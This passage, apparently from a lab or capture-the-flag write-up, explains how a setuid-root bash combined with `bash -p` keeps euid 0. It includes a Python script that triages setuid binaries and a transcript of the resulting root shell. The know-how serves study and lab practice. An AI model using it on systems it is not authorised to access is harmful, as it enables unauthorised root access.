Why -p: when bash starts with an effective UID different from the real UID, which is exactly the state a setuid-root binary starts in, it normally protects the system by resetting the effective UID back to the real UID, so a plain `bash` would drop the privilege immediately. The -p option turns on privileged mode, in which that reset does not happen; the shell keeps euid 0. In the same mode bash also skips the $BASH_ENV and $ENV startup files, does not import shell functions from the environment, and ignores SHELLOPTS, BASHOPTS, CDPATH and GLOBIGNORE from the environment.
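The listing above is long mainly because every snap image carries its own copy of the base tools. The following Python, an added example and not the original author's code, reduces a saved find listing to the entries worth a second look. BASELINE is an assumed list of binaries that are setuid-root on a stock Ubuntu 20.04 install, SHELLS are programs that hand over a shell or code execution when setuid, and the sample listing is constructed from the output above; `scan()` does the same against a live filesystem.

```python
import os
import stat
from typing import List, NamedTuple, Optional

# Assumed baseline: binaries that ship setuid-root on a stock Ubuntu 20.04 system
BASELINE = {
    "chfn", "chsh", "gpasswd", "mount", "umount", "newgrp", "passwd", "su",
    "sudo", "fusermount", "pkexec", "at", "ping", "snap-confine", "ssh-keysign",
    "dbus-daemon-launch-helper", "dmcrypt-get-device", "polkit-agent-helper-1",
}
# Programs that give a shell or arbitrary execution outright when setuid-root
SHELLS = {"bash", "sh", "dash", "zsh", "ksh", "python3", "perl", "env", "find", "vim"}


class Finding(NamedTuple):
    path: str
    reason: str


def suspicious(path: str) -> Optional[Finding]:
    """Name-based triage for a path already known to be a setuid-root file."""
    if path.startswith("/snap/"):
        return None  # copies of the base tools inside snap images; review the host ones
    name = os.path.basename(path)
    if name in SHELLS:
        return Finding(path, "setuid shell/interpreter: start it with -p to keep euid 0")
    if name not in BASELINE:
        return Finding(path, "not in the stock setuid baseline; check with ls -l and strings")
    return None


def classify(path: str, mode: int, uid: int) -> Optional[Finding]:
    """Full check from stat data: regular file, SUID bit set, owned by root."""
    if not (stat.S_ISREG(mode) and mode & stat.S_ISUID and uid == 0):
        return None
    return suspicious(path)


def triage_find_output(text: str) -> List[Finding]:
    """Apply the triage to saved `find / -perm -4000 -type f` output, one path per line."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            hit = suspicious(line)
            if hit:
                hits.append(hit)
    return hits


def scan(root: str = "/") -> List[Finding]:
    """Live version: walk the filesystem with lstat, as find -type f would."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)  # lstat: a symlink is not a regular file
            except OSError:
                continue
            hit = classify(p, st.st_mode, st.st_uid)
            if hit:
                hits.append(hit)
    return hits


# Constructed from the listing above: the host entries plus two snap copies
SAMPLE = """\
/snap/core18/1754/bin/su
/snap/core18/1754/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su
"""

if __name__ == "__main__":
    for hit in triage_find_output(SAMPLE):
        print(f"{hit.path}: {hit.reason}")
```

On this listing the only survivor is /usr/bin/bash. The baseline is deliberately a set of names, so a setuid copy of a baseline tool in an odd directory still shows up only if you look at the path; `ls -l` on each hit is the cheap confirmation.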
Run bash -p (which resolves to the setuid /usr/bin/bash) and check:
```text
bash-5.0# whoami
root
bash-5.0# pwd
/
bash-5.0# id
uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)
bash-5.0#
```
Note that uid is still 1000 while euid is 0: whoami reports the effective UID, and file permission checks use the effective UID, so /root is now readable. That is the box.
Reference articles for this reproduction:
https://www.cnblogs.com/takagisan/p/16253546.html
https://blog.csdn.net/qq_74240553/article/details/135679410